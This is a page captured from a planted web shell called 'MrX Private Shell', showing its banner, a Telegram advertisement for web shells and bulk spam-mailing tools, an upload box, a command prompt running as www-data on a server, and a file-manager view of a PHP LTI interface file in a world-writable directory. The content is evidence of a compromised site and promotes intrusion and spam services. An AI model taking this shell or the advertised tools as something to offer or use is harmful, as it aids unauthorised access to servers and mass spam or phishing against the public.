__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

namespace Packback\Lti1p3\Interfaces;

use Psr\Http\Message\ResponseInterface;

/** @internal */
interface ILtiServiceConnector
{
    public function getAccessToken(ILtiRegistration $registration, array $scopes): string;

    public function makeRequest(IServiceRequest $request): ResponseInterface;

    public function getResponseBody(ResponseInterface $response): ?array;

    public function getResponseHeaders(ResponseInterface $response): ?array;

    public function makeServiceRequest(
        ILtiRegistration $registration,
        array $scopes,
        IServiceRequest $request,
        bool $shouldRetry = true
    ): array;

    public function getAll(
        ILtiRegistration $registration,
        array $scopes,
        IServiceRequest $request,
        ?string $key
    ): array;

    public function setDebuggingMode(bool $enable): ILtiServiceConnector;
}

Filemanager

Name Type Size Permission Actions
ICache.php File 537 B 0777
ICookie.php File 227 B 0777
IDatabase.php File 289 B 0777
ILtiDeployment.php File 201 B 0777
ILtiRegistration.php File 1008 B 0777
ILtiServiceConnector.php File 883 B 0777
IMessageValidator.php File 271 B 0777
IMigrationDatabase.php File 1.04 KB 0777
IServiceRequest.php File 785 B 0777
Filemanager